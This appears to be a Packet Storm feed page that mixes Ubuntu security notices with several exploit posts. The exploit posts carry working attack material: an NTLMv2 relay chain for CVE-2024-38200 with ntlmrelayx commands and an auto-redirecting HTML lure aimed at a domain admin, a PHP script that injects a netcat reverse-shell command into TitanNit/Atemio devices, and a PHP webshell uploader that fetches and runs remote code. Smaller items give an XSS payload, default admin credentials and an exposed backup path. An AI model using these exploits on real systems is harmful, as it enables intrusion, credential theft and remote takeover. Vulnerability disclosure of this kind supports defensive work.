Microsoft Office 2019 MSO build 1808 (16.0.10411.20011) and Microsoft 365 MSO version 2403 build 16.0.17425.20176 suffer from an NTLMv2 hash disclosure vulnerability.

# Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: https://www.office.com/  
# Software Link: https://www.office.com/  
# Details: https://github.com/passtheticket/CVE-2024-38200  
# Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)  
# Tested against: Windows 11  
# CVE: CVE-2024-38200

# Description  
MS Office URI schemes allow for fetching a document from remote source.   
MS URI scheme format is '< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >' .  
Example: ms-word:ofe|u|http://hostname:port/leak.docx  
When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.

# Proof Of Concept  
 If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.

1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.  
$ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local

2. Fire up ntlmrelayx with following command  
$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080

3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Microsoft Office</title>  
</head>  
<body>  
    <a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>

    <script>  
        function navigateToLink() {  
            var link = document.getElementById('link');  
            if (link) {  
                var url = link.getAttribute('href');  
                window.location.href = url;  
            }  
        }  
        window.onload = navigateToLink;  
    </script>  
</body>  
</html> 

4. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)

5. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.

Microsoft Office NTLMv2 Disclosure

Ubuntu Security Notice 7043-2 - USN-7043-1 fixed a vulnerability in cups-filters. This update provides the corresponding update for Ubuntu 18.04 LTS. Simone Margaritelli discovered that the cups-filters cups-browsed component could be used to create arbitrary printers from outside the local network. In combination with issues in other printing components, a remote attacker could possibly use this issue to connect to a system, created manipulated PPD files, and execute arbitrary code when a printer is used. This update disables support for the legacy CUPS printer discovery protocol.

    ==========================================================================Ubuntu Security Notice USN-7043-2October 01, 2024cups-filters vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:cups-filters could be made to run programs if it received specially craftednetwork traffic.Software Description:- cups-filters: OpenPrinting CUPS FiltersDetails:USN-7043-1 fixed a vulnerability in cups-filters. This update providesthe corresponding update for Ubuntu 18.04 LTS.Original advisory details: Simone Margaritelli discovered that the cups-filters cups-browsed component could be used to create arbitrary printers from outside the local network. In combination with issues in other printing components, a remote attacker could possibly use this issue to connect to a system, created manipulated PPD files, and execute arbitrary code when a printer is used. This update disables support for the legacy CUPS printer discovery protocol.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  cups-browsed                    1.20.2-0ubuntu3.3+esm1                                  Available with Ubuntu Pro  cups-filters                    1.20.2-0ubuntu3.3+esm1                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7043-2  https://ubuntu.com/security/notices/USN-7043-1  CVE-2024-47176

Ubuntu Security Notice USN-7043-2

Ubuntu Security Notice 7049-1 - It was discovered that PHP incorrectly handled parsing multipart form data. A remote attacker could possibly use this issue to inject payloads and cause PHP to ignore legitimate data. It was discovered that PHP incorrectly handled the cgi.force_redirect configuration option due to environment variable collisions. In certain configurations, an attacker could possibly use this issue bypass force_redirect restrictions.

==========================================================================  
Ubuntu Security Notice USN-7049-1  
October 01, 2024

php7.4, php8.1, php8.3 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.3: HTML-embedded scripting language interpreter  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled parsing multipart form data.  
A remote attacker could possibly use this issue to inject payloads and  
cause PHP to ignore legitimate data. (CVE-2024-8925)

It was discovered that PHP incorrectly handled the cgi.force_redirect  
configuration option due to environment variable collisions. In certain  
configurations, an attacker could possibly use this issue bypass  
force_redirect restrictions. (CVE-2024-8927)

It was discovered that PHP-FPM incorrectly handled logging. A remote  
attacker could possibly use this issue to alter and inject arbitrary  
contents into log files. This issue only affected Ubuntu 22.04 LTS, and  
Ubuntu 24.04 LTS. (CVE-2024-9026)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libapache2-mod-php8.3           8.3.6-0ubuntu0.24.04.2  
  php8.3-cgi                      8.3.6-0ubuntu0.24.04.2  
  php8.3-cli                      8.3.6-0ubuntu0.24.04.2  
  php8.3-fpm                      8.3.6-0ubuntu0.24.04.2

Ubuntu 22.04 LTS  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.19  
  php8.1-cgi                      8.1.2-1ubuntu2.19  
  php8.1-cli                      8.1.2-1ubuntu2.19  
  php8.1-fpm                      8.1.2-1ubuntu2.19

Ubuntu 20.04 LTS  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.24  
  php7.4-cgi                      7.4.3-4ubuntu2.24  
  php7.4-cli                      7.4.3-4ubuntu2.24  
  php7.4-fpm                      7.4.3-4ubuntu2.24

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7049-1  
  CVE-2024-8925, CVE-2024-8927, CVE-2024-9026

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.3/8.3.6-0ubuntu0.24.04.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.19  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.24

Ubuntu Security Notice USN-7049-1

Tourism Management System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /rate_review.php?id=1"><script>alert(/indoushka/)</script>[+] http://localhost/tourism/rate_review.php?id=1%22%3E%3Cscript%3Ealert(/indoushka/)%3C/script%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tourism Management System 1.0 Cross Site Scripting

TitanNit Web Control 2.01 and Atemio 7600 suffer from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : TitanNit Web Control 2.01 / Atemio 7600 php code injection Vulnerability                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sat-world.com/Atemio-AM-520-HD-TitanNit-Edition                                                                 |  
=============================================================================================================================================

poc :

[+] Explanation: 

    We used the exec function to run the nc(netcat) command which subscribes to the subscriptions offered by the privileged execution.

    In Windows environments, you can use the netcat tool for communications headsets.

    Note: Make sure that netcat is installed on your system (you can download netcat for Windows). 

   [+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload : 

<?php

class RemoteControl {

    private $timeout = 10;  
    private $target;  
    private $callback;  
    private $path = "/query?getcommand=&cmd=";  
    private $lport;  
    private $cmd;

    public function beacon() {  
        $this->cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc ";  
        $this->cmd .= $this->callback . " ";  
        $this->cmd .= $this->lport . " ";  
        $this->cmd .= ">/tmp/j";  
        $this->path .= $this->cmd;

        $ch = curl_init($this->target . $this->path);  
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
        curl_exec($ch);  
        curl_close($ch);  
    }

    public function slusaj() {  
        echo "[*] Listening on port " . $this->lport . "\n";  
        sleep(1);

        // Windows solution using exec  
        $cmd = "nc -lvp " . $this->lport; // Example with netcat listener  
        exec($cmd, $output, $result_code);

                if ($result_code == 0) {  
            echo "[*] Rootshell session opened\n";  
            foreach ($output as $line) {  
                echo $line . "\n";  
            }  
        } else {  
            echo "[!] Error in executing the listener\n";  
        }  
    }

    public function tajmer() {  
        for ($z = $this->timeout; $z > 0; $z--) {  
            echo "[*] Callback waiting: " . $z . "s\r";  
            sleep(1);  
        }  
    }

    public function thricer() {  
        echo "[*] Starting callback listener\n";

        // Run listener in the background using exec  
        $this->slusaj();

        echo "[*] Generating callback payload\n";  
        sleep(1);  
        echo "[*] Calling\n";  
        $this->beacon();  
    }

    public function howto($argv) {  
        if (count($argv) != 4) {  
            $this->usage();  
        } else {  
            $this->target = $argv[1];  
            $this->callback = $argv[2];  
            $this->lport = (int)$argv[3];

            if (strpos($this->target, "http") === false) {  
                $this->target = "http://" . $this->target;  
            }  
        }  
    }

    public function dostabesemolk() {

    }

    public function usage() {  
        $this->dostabesemolk();  
        echo "Usage: php titan.php <target ip> <listen ip> <listen port>\n";  
        echo "Example: php titan.php 192.168.1.13:20000 192.168.1.8 9999\n";  
        exit(0);  
    }

    public function main($argv) {  
        $this->howto($argv);  
        $this->thricer();  
    }  
}

$control = new RemoteControl();  
$control->main($argv);  
?>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

Teacher Subject Allocation Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Teacher Subject Allocation Management System 1.0 Insecure Settings Vulnerability                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/tsas/admin/login.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Teacher Subject Allocation Management System 1.0 Insecure Settings

Ubuntu Security Notice 6964-2 - USN-6964-1 fixed a vulnerability in ORC. This update provides the corresponding updates for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. Noriko Totsuka discovered that ORC incorrectly handled certain specially crafted files. An attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6964-2  
October 01, 2024

orc vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

ORC could be made to crash or execute arbitrary code

Software Description:  
- orc: Library of Optimized Inner Loops Runtime Compiler

Details:

USN-6964-1 fixed a vulnerability in ORC. This update provides the  
corresponding updates for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

Original advisory details:

 Noriko Totsuka discovered that ORC incorrectly handled certain  
 specially crafted files. An attacker could possibly use this issue  
 to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS  
  liborc-0.4-0                    1:0.4.28-1ubuntu0.1~esm1  
                                  Available with Ubuntu Pro  
  liborc-0.4-dev                  1:0.4.28-1ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  liborc-0.4-0                    1:0.4.25-1ubuntu0.1~esm1  
                                  Available with Ubuntu Pro  
  liborc-0.4-dev                  1:0.4.25-1ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6964-2  
  https://ubuntu.com/security/notices/USN-6964-1  
  CVE-2024-40897

Ubuntu Security Notice USN-6964-2

Task Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Task Management System 1.0 php code injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/task-management-system-in-php-mysql-source-code/?wpdmdl=8164&refresh=66bb949d45e891723569309 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP code is designed to create a file and inject PHP code.[+] save payload as poc.php [+] usage : C:\www\test>php poc.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'save' => '',        'firstname' => 'az',        'lastname' => 'azgt',        'email' => 'az@gt.gt',        'password' => 'az@gtgt',      'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),                  'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$target_ip/ajax.php?action=update_user");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $target_ip/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Task Management System 1.0 Code Injection

Ubuntu Security Notice 7022-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7022-2October 01, 2024linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Modular ISDN driver;  - MMC subsystem;  - SCSI drivers;  - F2FS file system;  - GFS2 file system;  - Netfilter;  - RxRPC session sockets;  - Integrity Measurement Architecture(IMA) framework;(CVE-2021-47188, CVE-2024-42160, CVE-2024-42228, CVE-2022-48863,CVE-2024-26677, CVE-2024-26787, CVE-2024-38570, CVE-2024-39494,CVE-2022-48791, CVE-2024-27012)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1117-raspi    5.4.0-1117.129  linux-image-raspi               5.4.0.1117.147  linux-image-raspi2              5.4.0.1117.147After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7022-2  https://ubuntu.com/security/notices/USN-7022-1  CVE-2021-47188, CVE-2022-48791, CVE-2022-48863, CVE-2024-26677,  CVE-2024-26787, CVE-2024-27012, CVE-2024-38570, CVE-2024-39494,  CVE-2024-42160, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1117.129

Ubuntu Security Notice USN-7022-2

Supply Chain Management version 1.0 suffers from a backup disclosure vulnerability.

    =============================================================================================================================================| # Title     : Supply Chain Management v1.0 Backup Disclosure Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Supply_Chain_Management_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD.zip         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /backup/[+] Panel : http://127.0.0.1/scm-master/backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Source

Packet Storm